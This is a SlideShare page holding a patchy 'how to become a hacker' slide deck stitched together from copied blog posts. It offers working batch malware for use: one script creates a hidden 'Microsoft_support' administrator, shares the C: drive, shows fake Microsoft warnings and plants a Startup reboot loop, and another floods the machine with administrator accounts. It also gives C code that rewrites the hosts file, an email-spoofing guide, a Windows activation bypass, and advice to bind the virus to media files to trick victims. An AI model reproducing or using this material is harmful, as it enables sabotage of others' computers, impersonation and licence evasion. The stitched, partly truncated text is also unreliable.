SlideShare ist ein Scribd-Unternehmen logo
1 von 16
Today every body want become hacker because this thing is so cool .

You know are you actually hacker or just a kid.

THERE ARE FOUR STAGES TO BECOME HACKER SO CHECK WHETHER WHERE ARE
YOU BELONG .

THERE ARE FOUR LEVEL

SO WAKE UP



1>HACKING FOR KIDS

[Here's another one in the long list of ideas I'd like to execute but will probably never
have time.]

If kids learn programming these days, it's usually LOGO or BASIC or some other
training-wheels language. This is no way to breed the next generation of hackers. And
I'm sure there are geeks around the world who would love their sons, daughters,
nephews and nieces to get into programming, but look down the shelves of their
bookshop with a cry of despair. It seems to be a choice between "Visual Basic for
Dummies", "Programming Excel" and "Learn C in 24 Easy Lessons". As Dijkstra
famously said, ""It is practically impossible to teach good programming to students that
have had a prior exposure to BASIC: as potential programmers they are mentally
mutilated beyond hope of regeneration." And when you are learning to program, you
want to write programs which do stuff, not have to spend ages in C managing memory
and making sure your strings are terminated with 0.

Sometimes these books come with a CD, containing a cut-down version of a
commercial development environment they are hoping you will buy, and perhaps a
weedy editor, all running under Windows with no source code available. What sort of
example is that to set? Trying to learn to hack on a Microsoft Windows machine or any
other closed-source system is like trying to learn to dance while wearing a body cast.

How about a book "Hacking for Kids"?0 Written for teenagers, it would explain how cool
hacking is and the path to becoming a hacker, and would give kids fun and interesting
programming projects using powerful modern languages such as Perl, free Java,
Python and JavaScript. It would teach best practice in programming, not treating the
user as an idiot who can only cope with cut-and-pasting code chunks in a jigsaw-puzzle
fashion.

b> or make a fake shutdown virus

C>hack email by
Home » EMAIL HACKING, HOW-TO GUIDES, NETWORK HACKS

How to Send Anonymous Emails

Submitted by Srikanth on Tuesday, 10 March 200980 Comments.How To Send
Anonymous Emails




Most of us are very curious to know a method to send anonymous emails to our friends
for fun. But the question is, is it possible to send anonymous emails in spite of the
advanced spam filtering technology adopted by email service provides like Gmail,
Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send
anonymous emails to your friends. For example, you can send an email to your friend
with the following sender details.



From: Bill Gates <billg@microsoft.com>The art of sending this kind emails is known as
Email Spoofing. In my previous post on How to Send Fake Email I insisted on using
your own SMTP server to send anonymous emails. This method used to work
successfully in the past, but today it has a very low success rate since Gmail and
Yahoo(all major email service providers) blocks the emails that are sent directly from a
PC. In this post I have come up with a new way to send anonymous emails (spoofed
emails) that has 100% success rate. If you have to successfully send an anonymous
email or spoofed email, you should send it using a relay server.




What is a Relay Server?



In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo
as an authorised sender of the email. So, when you send an email using a relay server,
the email service providers like Yahoo and Gmail blindly accept the emails and deliver it
to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo
will reject all the emails sent from this SMTP server. This is the reason for which using
our own SMTP server to send emails fail.
So What‟s Next?



Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually
all the emails that are sent from web hosting providers are trusted and authorised. So,
you have to find a free web hosting provider that allows you to send emails. But, most of
the free Web Hosts disable the Mail feature and do not allow the users to send emails.
This is done just to avoid spamming. However all the paid hosting plans allow you to
send any number of emails. Once you find a hosting service that allows to send emails
from their servers, it‟s just a cakewalk to send anonymous emails. All we have to do is
just modify the email headers to insert the spoofed From address field into it.



I have created a PHP script that allows you to send emails from any name and email
address of your choice. Here is a step-by-step procedure to setup your own Anonymous
Email Sender Script




1. Goto X10 Hosting and register a new account.



2. Download my Anonymous Email Sender Script (sendmail.rar).



3. Login to your FreeWebHostingArea Account and click on File Manager.



4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.



5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.



6. Now type the following URL
d> make trojan virus

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is
full

5. Once the drive is full, stop the process.

You can download the Trojan source code




2>hacking for boys

In this case user have little potential

Like user know about c programme etc. but they donot create and correct c hard
programme ?

How to Use Windows Without Activation

1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt”
and select “Run as Administrator“. If you are not the administrator then you are prompted to
enter the password, or else you can proceed to step-2.

2. Now type the following command and hit enter

slmgr -rearm

3. You will be prompted to restart the computer. Once restarted the trial period will be once
again reset to 30 days. You can use the above command for up to 3 times by which you can
extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240
days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following
location
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSoftwareProtectionPlatform
5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can
skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free
Windows 7 usage.

120 days using “slmgr -rearm” command before registry edit

+


240 days using “slmgr -rearm” command after registry edit

=    360 Days



B>Guessing Game In C

They start basic programme like this

#include<stdio.h>
#include<stdlib.h>
#include<time.h>

void main()
{
int num,guess=-1,tries=0,pass=0;
time_t t;
srand((unsigned)time(&t));
num=rand()%100;
while((guess!=num)&&tries<8)
{
printf(“Enter the guess num b/w 0 & 100 (you have %d tries left out)n”,(8-tries));
scanf(“%d”,&guess);
tries++;
if(guess==num)
{
printf(“Hurray you guessed it correctly!!!n”);
pass=1;
}
else if(num< guess)
printf(“Your guess is too highn”);
else
printf(“Your guess is too lown”);
}
if(pass==0)
printf(“Sorry you lost! The correct number is %dn”,num);
}

c>this programme is not hacking but a trick

#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:windowssystem32driversetchosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:windowssystem32driversetchosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:windowssystem32driversetchosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:windowssystem32driversetchosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:windowssystem32driversetchosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:windowssystem32driversetchosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:windowssystem32driversetchosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:windowssystem32driversetchosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”n”);
for(i=0;i<6;i++)
fprintf(target,”%st%sn”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

For step-by-step compilation guide, refer my post How to compile C Programs.
Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of
the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.

%windir%system32driversetc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll
see something like this

127.0.0.1                 google.com

5. Delete all such entries which contain the names of blocked sites

d>block usb

#include<stdio.h>



void main()

{

system("reg add
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUSBSTOR /v Start
/t REG_DWORD /d 3 /f");

}



e> in this case user have more knowleage about virus ,hacking software, trick to create
fake virus but in this time user waste their time to show off.

So practice more programing like c, c++ .



We talk later about

3>hacking for men
In this stage user know about batch file programming or java and perl.

Batch File Programming

Introduction

Batch file programming is the native programming offered by the Microsoft Windows
Operating

System. Batch file is created using any text editors like notepad, WordPad,
WinWord or so on, which

comprises of a sequence of built-in commands used to perform some often done
tasks like deleting a

series of files of same type or of different type, creating logs, clearing unwanted
craps from your

computer and even for creating a batch VIRUS.

Whenever a Batch program is executed, it was interpreted line-by-line by the CLI
(Command

Line Interpreter) command.com or the cmd.exe. Batch file is really helpful in automating
tedious tasks

and for maintaining system logs. The commands used while creating a batch file are
case insensitive, in

the sense that it may accept both small and upper case letters.

So I am give you example of programming

How to m C_relwarC708 v1.0 Virus

Here is the source code for the virus C_relwarC708 v1.0, created by me.

@echo off

cd

cd %SystemRoot%system32

md 1001

cd
cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as
01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r
4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C: /UNLIMITED

cd %SystemRoot%system321001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on
your

computer, Press Yes to Neutralize the virus or Press No to Ignore the
Virus”,20,”Warning”) >

%SystemRoot%system321001warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul ake virus

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3,
3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%system321001warnusr.vbs”
at 12:02 /interactive “%SystemRoot%system321001warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or
Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or
Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t
w1|| b3

3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%system321001warnusr.vbs “%systemdrive%Documents and
SettingsAll

UsersStart MenuProgramsStartupwarnusr.vbs”

rem

***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3
m5g and

w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs
your

attention right now. Hey your computer got infected by Virus. Not even a single anti-
virus can

detect this virus now. Wanna try? Hahahaha….! ” >
%systemroot%system321001sd.bat

copy %systemroot%Documents and SettingsAll UsersStart
MenuProgramsStartupsd.bat

“%systemdrive%Documents and SettingsAll UsersStart
MenuProgramsStartupsd.bat”

rem
***************************************************************************

cd

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%Documents and SettingsAll UsersStart MenuProgramsStartup

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd

cd %systemroot%system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code and paste it in a notepad, then save it with the .bat extension.

This virus program will begin its operation at C:windowssystem32 and creates a new
directory

with name '1001', changes the time to 12:00 and date to 01-01-2000, then creates a
new user with account

name 'Microsoft_support' with a password 'support' matching the account.

It automatically assigns administrator rights to the user account that was created, then
shares the

root drive 'C:' which really is a security issue making the system completely vulnerable.

It will create a VBScript file with name 'warnusr.vbs' that is used to display a message
'Microsoft

Windows recently had found some Malicious Virus on your computer, Press Yes to
Neutralize the virus or
Press No to Ignore the Virus', that really seems to be coming from the operating system
itself, then it will

change the keyboard setting by reducing the rate and delay time.

Since the time and date has been already modified by the virus, it will automatically
pop up a message

stating 'You are requested to restart your Computer Now to prevent Damages or
Data loss' exactly at

12:01 and 12:02, if the user restarts the computer, then it‟s gone.

Whenever the user try to login to the computer, it will automatically reboots
continuously, because the

command 'shutdown -r' is set with time 00, and kept in start-up folder, the user has
nothing to stop this

unless he enters in safe mode and delete the file, more over the file is set with system
and hidden attribute

making it invisible.

The only way to stop this is to enter in safe mode and disable the start-up items, and
then delete the file

that reside in C:windowssystem321001 and in the start-up folder.

You can also use some exe-binders to bind this virus with any audio, video, text or
whatever the files

may be, then use some social engineering technique to make the victim execute the file
by himself to

harm his/her computer.

You can create this virus without using any third party tools in windows, also instead of
exe-binder, you

can use the „iexpress‟ wizard to create a custom package.

2>second virus

Msg Annoyer:
Message annoyer is a batch program that uses the same concept as above, but will
interact with

the user anyhow annoying and irritating them by popping up some message box
containing some

messages in it.

@echo off

:annoy

msg * Hi there!

msg * How u doin ?

msg * Are you fine ?

msg * Never mind about me....

msg * I am not here to annoy you....

msg * I am caring for you.....

msg * start counting from 1 to 5, i Will be outta this place.....

msg * 1

msg * 2

msg * 3

msg * 4

msg * 5

goto annoy

This program will pops up a small message box as shown below,

Containing the text mentioned in the program given above.

This message box will pop up until for endless loop, which really annoys the person
sitting before the
computer. Even these small popup windows may crash the computer, if it overloads the
memory.

3>virus

User Flooder:

The „user flooder‟ program will create a number of user accounts with random
numbers, and

assign administrator rights to them by itself, moreover the password set for those user
accounts were too

random numbers.

@echo off

:usrflood

set usr=%random%

net users %usr% %random% /add

net localgroup administrators %usr% /add

goto usrflood

Since we have already learned about the environment variables, the „%random%‟
is an

environment variable that generates a random positive integer. We have set a
variable manually named

„usr‟ for holding the random number generated by the %random%, then a new user
account is created

with the generated number as the account name and was assigned with a random
password, then assigned

with administrator rights, and this process gets repeated for a infinite loop, so it will
create more than 50

user accounts in less than a minute. This will sure degrade the computer
performance and the user will
take a long long time to delete the user accounts, sometimes they will simply format
their hard drives.



>Converting Batch to Executables

So far we have learnt how to create a batch file program with an .bat extension, but
there is a way

 convert all these batch files into executable files with an .exe extension, so that it will
become hard for

e people to find, what the program exactly does, else they may have a chance to
have a look at your

urce code, even to copy your source code.

You have to download the batch to exe convertor from the internet in order to convert
the batch to

xecutable; here I have enclosed the download link, where you can download this tool.

Dowload Link :       http://tinyurl.com/c29kgo

Tool Name        :   Bat to Exe Converter V1.5

opy and paste the above link in the address bar of your web browser, or you can directly
CTRL + Click

n the link if your computer is hooked up to the internet, then download the file.

4>hacking for old man

In this stage you know with time.

But in case you want more than email me rsanoria09@gmail.com

Weitere ähnliche Inhalte

Ähnlich wie How to become hacker

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Step by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometStep by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometPich Pra Tna
 
Learn awesome hacking tricks
Learn awesome hacking tricksLearn awesome hacking tricks
Learn awesome hacking tricksSudhanshu Mishra
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Sniffing https using yamas lucideuslabs
Sniffing https using yamas lucideuslabsSniffing https using yamas lucideuslabs
Sniffing https using yamas lucideuslabsRohan Ahuja
 
Sniffing HTTPS Using YAMAS | Lucideus Tech
Sniffing HTTPS Using YAMAS | Lucideus TechSniffing HTTPS Using YAMAS | Lucideus Tech
Sniffing HTTPS Using YAMAS | Lucideus TechRahul Tyagi
 
100% Code Coverage in Real World Software
100% Code Coverage in Real World Software100% Code Coverage in Real World Software
100% Code Coverage in Real World SoftwareAndreas Czakaj
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Resisting The Feature Creature
Resisting The Feature CreatureResisting The Feature Creature
Resisting The Feature CreatureChristian Heilmann
 
Security panel-western-mass-drupal-camp
Security panel-western-mass-drupal-campSecurity panel-western-mass-drupal-camp
Security panel-western-mass-drupal-campcwworks
 
What Are We Still Doing Wrong
What Are We Still Doing WrongWhat Are We Still Doing Wrong
What Are We Still Doing Wrongafa reg
 
You shouldneverdo
You shouldneverdoYou shouldneverdo
You shouldneverdodaniil3
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 

Ähnlich wie How to become hacker (20)

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 
Step by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometStep by Step on How to Setup DarkComet
Step by Step on How to Setup DarkComet
 
Learn awesome hacking tricks
Learn awesome hacking tricksLearn awesome hacking tricks
Learn awesome hacking tricks
 
Spam Wars
Spam WarsSpam Wars
Spam Wars
 
Academy4 l m
Academy4 l mAcademy4 l m
Academy4 l m
 
Password craking techniques
Password craking techniques Password craking techniques
Password craking techniques
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Sniffing https using yamas lucideuslabs
Sniffing https using yamas lucideuslabsSniffing https using yamas lucideuslabs
Sniffing https using yamas lucideuslabs
 
Sniffing HTTPS Using YAMAS | Lucideus Tech
Sniffing HTTPS Using YAMAS | Lucideus TechSniffing HTTPS Using YAMAS | Lucideus Tech
Sniffing HTTPS Using YAMAS | Lucideus Tech
 
100% Code Coverage in Real World Software
100% Code Coverage in Real World Software100% Code Coverage in Real World Software
100% Code Coverage in Real World Software
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Resisting The Feature Creature
Resisting The Feature CreatureResisting The Feature Creature
Resisting The Feature Creature
 
Security panel-western-mass-drupal-camp
Security panel-western-mass-drupal-campSecurity panel-western-mass-drupal-camp
Security panel-western-mass-drupal-camp
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
What Are We Still Doing Wrong
What Are We Still Doing WrongWhat Are We Still Doing Wrong
What Are We Still Doing Wrong
 
2600 Thailand #50 From 0day to CVE
2600 Thailand #50 From 0day to CVE2600 Thailand #50 From 0day to CVE
2600 Thailand #50 From 0day to CVE
 
You shouldneverdo
You shouldneverdoYou shouldneverdo
You shouldneverdo
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
 
Tips n tricks
Tips n tricksTips n tricks
Tips n tricks
 

Mehr von Raman Sanoria

Bluray disc-ppt-by-raman sanoria
Bluray disc-ppt-by-raman sanoriaBluray disc-ppt-by-raman sanoria
Bluray disc-ppt-by-raman sanoriaRaman Sanoria
 
Gsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaGsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaRaman Sanoria
 
Gsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaGsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaRaman Sanoria
 
3 g wireless by raman sanoria
3 g wireless by raman sanoria3 g wireless by raman sanoria
3 g wireless by raman sanoriaRaman Sanoria
 
Wire line project by raman sanoria
Wire line project by raman sanoriaWire line project by raman sanoria
Wire line project by raman sanoriaRaman Sanoria
 
Gsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaGsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaRaman Sanoria
 
Blu rayind-by rsanoria
Blu rayind-by rsanoriaBlu rayind-by rsanoria
Blu rayind-by rsanoriaRaman Sanoria
 
Blu ray disks by.raman sanoria
Blu ray disks by.raman sanoriaBlu ray disks by.raman sanoria
Blu ray disks by.raman sanoriaRaman Sanoria
 
Question paper of ncc ‘b’ certificate by rsanoria
Question paper of ncc ‘b’ certificate by rsanoriaQuestion paper of ncc ‘b’ certificate by rsanoria
Question paper of ncc ‘b’ certificate by rsanoriaRaman Sanoria
 

Mehr von Raman Sanoria (10)

Bluray disc-ppt-by-raman sanoria
Bluray disc-ppt-by-raman sanoriaBluray disc-ppt-by-raman sanoria
Bluray disc-ppt-by-raman sanoria
 
Gsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaGsm introduction made by raman sanoria
Gsm introduction made by raman sanoria
 
Gsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaGsm introduction made by raman sanoria
Gsm introduction made by raman sanoria
 
3 g wireless by raman sanoria
3 g wireless by raman sanoria3 g wireless by raman sanoria
3 g wireless by raman sanoria
 
Wire line project by raman sanoria
Wire line project by raman sanoriaWire line project by raman sanoria
Wire line project by raman sanoria
 
Gsm introduction made by raman sanoria
Gsm introduction made by raman sanoriaGsm introduction made by raman sanoria
Gsm introduction made by raman sanoria
 
Blu rayind-by rsanoria
Blu rayind-by rsanoriaBlu rayind-by rsanoria
Blu rayind-by rsanoria
 
Blu ray disks by.raman sanoria
Blu ray disks by.raman sanoriaBlu ray disks by.raman sanoria
Blu ray disks by.raman sanoria
 
Question paper of ncc ‘b’ certificate by rsanoria
Question paper of ncc ‘b’ certificate by rsanoriaQuestion paper of ncc ‘b’ certificate by rsanoria
Question paper of ncc ‘b’ certificate by rsanoria
 
Mobile sniffer
Mobile snifferMobile sniffer
Mobile sniffer
 

Kürzlich hochgeladen

Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationRosabel UA
 
Oppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmOppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmStan Meyer
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
Measures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped dataMeasures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped dataBabyAnnMotar
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxHumphrey A Beña
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...JojoEDelaCruz
 
TEACHER REFLECTION FORM (NEW SET........).docx
TEACHER REFLECTION FORM (NEW SET........).docxTEACHER REFLECTION FORM (NEW SET........).docx
TEACHER REFLECTION FORM (NEW SET........).docxruthvilladarez
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfPatidar M
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfJemuel Francisco
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4MiaBumagat1
 
ClimART Action | eTwinning Project
ClimART Action    |    eTwinning ProjectClimART Action    |    eTwinning Project
ClimART Action | eTwinning Projectjordimapav
 
ROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxVanesaIglesias10
 
Integumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptIntegumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptshraddhaparab530
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfVanessa Camilleri
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 

Kürzlich hochgeladen (20)

Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translation
 
Oppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmOppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and Film
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
Measures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped dataMeasures of Position DECILES for ungrouped data
Measures of Position DECILES for ungrouped data
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
 
TEACHER REFLECTION FORM (NEW SET........).docx
TEACHER REFLECTION FORM (NEW SET........).docxTEACHER REFLECTION FORM (NEW SET........).docx
TEACHER REFLECTION FORM (NEW SET........).docx
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
Paradigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTAParadigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTA
 
LEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptx
LEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptxLEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptx
LEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptx
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdf
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4
 
ClimART Action | eTwinning Project
ClimART Action    |    eTwinning ProjectClimART Action    |    eTwinning Project
ClimART Action | eTwinning Project
 
ROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptx
 
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptxINCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
 
Integumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptIntegumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.ppt
 
ICS2208 Lecture6 Notes for SL spaces.pdf
